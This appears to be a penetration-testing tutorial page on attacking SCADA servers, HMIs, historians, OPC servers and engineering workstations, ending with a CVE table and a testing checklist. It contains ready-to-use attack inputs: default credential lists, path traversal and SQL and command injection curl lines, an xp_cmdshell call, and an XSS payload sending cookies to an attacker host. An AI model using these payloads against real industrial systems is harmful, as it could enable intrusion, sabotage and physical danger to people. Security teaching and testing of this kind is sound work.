SCADA/HMI Security

Exploitation

SCADA servers and HMI systems are the "brain" of industrial operations. Compromising these systems provides visibility into operations and often control over field devices.

SCADA Architecture

SCADA Components

  • MTU - Master Terminal Unit (central server)
  • RTU - Remote Terminal Unit (field device)
  • HMI - Human Machine Interface
  • Historian - Data archive
  • OPC Server - Protocol translator

Common SCADA Software

  • • Wonderware (AVEVA)
  • • FactoryTalk (Rockwell)
  • • WinCC (Siemens)
  • • Ignition (Inductive Automation)
  • • ClearSCADA (Schneider)

HMI Vulnerabilities

Web-Based HMI Attacks

Modern HMIs often include web interfaces for remote monitoring. These are vulnerable to traditional web application attacks.

bash 
# Common web vulnerabilities in HMI systems

# Default credentials
# Many HMI web interfaces have hardcoded or default passwords
admin:admin
administrator:password
user:user
operator:operator

# Directory traversal
curl "http://hmi.local/api/file?path=../../../etc/passwd"
curl "http://hmi.local/download?file=....//....//windows/system32/config/sam"

# SQL Injection
# Alarm history, event logs often use SQL backend
curl "http://hmi.local/alarms?start=2024-01-01' OR '1'='1"

# Command injection
# Diagnostic pages often execute system commands
curl "http://hmi.local/ping?host=127.0.0.1;id"

# XSS in alarm messages
# Alarm text displayed to operators may not be sanitized
<script>document.location='http://attacker/steal?c='+document.cookie</script>

Desktop HMI Attacks

bash 
# Traditional HMI applications (Windows-based)

# 1. Outdated Windows systems
# Many HMI stations run Windows 7, XP, or even 2000
# Check for unpatched vulnerabilities
nmap -sV --script vuln 192.168.100.50

# 2. Privilege escalation
# HMI operators often run as local admin
# Look for privilege escalation vectors

# 3. DLL hijacking
# HMI applications may load DLLs from insecure locations
# Place malicious DLL in search path

# 4. Configuration file manipulation
# HMI configs often stored in plain text
# May contain database credentials, server addresses

# 5. Project file manipulation
# Wonderware (.aaPKG)
# FactoryTalk (.ACD)
# WinCC (.zp)
# These can contain credentials and server configs

SCADA Server Attacks

Database Exploitation

bash 
# SCADA systems use databases for:
# - Configuration storage
# - Alarm history
# - Trending data
# - User accounts

# Common databases:
# - Microsoft SQL Server
# - Oracle
# - PostgreSQL
# - Proprietary (Historian databases)

# Check for SQL Server
nmap -p 1433 --script ms-sql-info 192.168.100.10

# Default SCADA database credentials
# Wonderware: aaAdmin/wwAdmin
# FactoryTalk: often uses Windows auth
# Ignition: check gateway config

# SQL Server exploitation
# If sa account has weak password
sqsh -S 192.168.100.10 -U sa -P password
> xp_cmdshell 'whoami'

# Extract configuration data
# User tables, tag databases, communication configs

OPC Server Exploitation

bash 
# OPC (OLE for Process Control) servers bridge HMI to PLCs
# OPC DA (classic) - DCOM-based
# OPC UA - Modern, TCP-based

# OPC UA enumeration
pip install opcua-client

python3 << 'EOF'
from opcua import Client

client = Client("opc.tcp://192.168.100.10:4840")
try:
    client.connect()
    
    # Browse the address space
    root = client.get_root_node()
    objects = root.get_child(["0:Objects"])
    
    def browse(node, depth=0):
        for child in node.get_children():
            print(" " * depth + str(child.get_browse_name()))
            browse(child, depth + 2)
    
    browse(objects)
    
finally:
    client.disconnect()
EOF

# Check for anonymous access
# Many OPC UA servers allow anonymous connections

# OPC DA requires DCOM access
# Often can be accessed if on same Windows domain
# Use tools like OPC Expert, MatrikonOPC Explorer

Historian Exploitation

Historians store time-series data from SCADA systems. They often contain years of operational data and may have weak access controls.

bash 
# Common Historians:
# - OSIsoft PI (now AVEVA)
# - Wonderware Historian
# - GE Proficy Historian
# - Honeywell PHD
# - AspenTech IP.21

# OSIsoft PI - Default ports
# 5450 - PI Data Archive
# 5457 - PI AF Server  
# 5459 - PI Buffering

# Check for PI Server
nmap -p 5450,5457,5459 192.168.100.20

# PI SDK exploitation
# If you can install PI SDK on attack machine:
# - Query historical data
# - Potentially write false data
# - Extract process knowledge

# Historian data value:
# - Learn normal process behavior
# - Identify when to attack (off-hours, maintenance)
# - Understand process limits
# - Historical attacks: manipulate data to hide evidence

Engineering Workstation Attacks

bash 
# Engineering workstations have:
# - PLC programming software
# - Network diagrams
# - Project backups
# - Credentials for all systems

# Valuable files to extract:
# Siemens: *.ap1*, *.s7p, *.zap* (TIA Portal projects)
# Allen-Bradley: *.ACD (Studio 5000 projects)
# Schneider: *.STU, *.XEF (Unity projects)

# Search for project files
dir /s /b *.acd *.ap* *.s7p *.stu

# Project files may contain:
# - PLC IP addresses
# - Passwords (sometimes encrypted, sometimes not)
# - Complete PLC logic
# - Network architecture

# Programming software often runs as admin
# Pivot through engineering WS to PLCs

Protocol Gateway Attacks

bash 
# Protocol gateways/converters translate between protocols
# Example: Modbus to EtherNet/IP

# Often have:
# - Web interfaces for configuration
# - Telnet/SSH access
# - Default credentials

# Common gateways:
# - Moxa devices
# - Red Lion
# - Anybus
# - HMS Networks

# Moxa default credentials
admin:admin
admin:moxa

# Gateway attacks:
# 1. Reconfigure routing
# 2. Man-in-the-middle ICS traffic
# 3. Block communication (DoS)
# 4. Inject false data

# Many gateways run embedded Linux
# Standard embedded device attacks apply

Common HMI/SCADA CVEs

CVE Product Vulnerability
CVE-2022-2003 Aveva InTouch Path Traversal
CVE-2020-25159 Ignition Gateway Auth Bypass
CVE-2019-10915 Siemens WinCC SQL Injection
CVE-2021-22779 Schneider Modicon Authentication Bypass

SCADA/HMI Testing Checklist

HMI Systems

  • ☐ Test web interfaces for OWASP vulnerabilities
  • ☐ Check for default credentials
  • ☐ Test local privilege escalation
  • ☐ Analyze project/config files

SCADA Servers

  • ☐ Database security assessment
  • ☐ OPC server access testing
  • ☐ Check for known CVEs
  • ☐ Test inter-process communications

Historians

  • ☐ Test authentication
  • ☐ Check for anonymous access
  • ☐ Assess data integrity controls
  • ☐ Test for data manipulation capabilities

Operator Impact

When testing HMI systems, consider the impact on operators. A crashed HMI means operators lose visibility into the process. Always have a rollback plan and test during planned downtime.

Related Topics

OT/ICS Security

Safety Considerations

Web Pentesting
← PLC/RTU Attacks Next: Safety Considerations →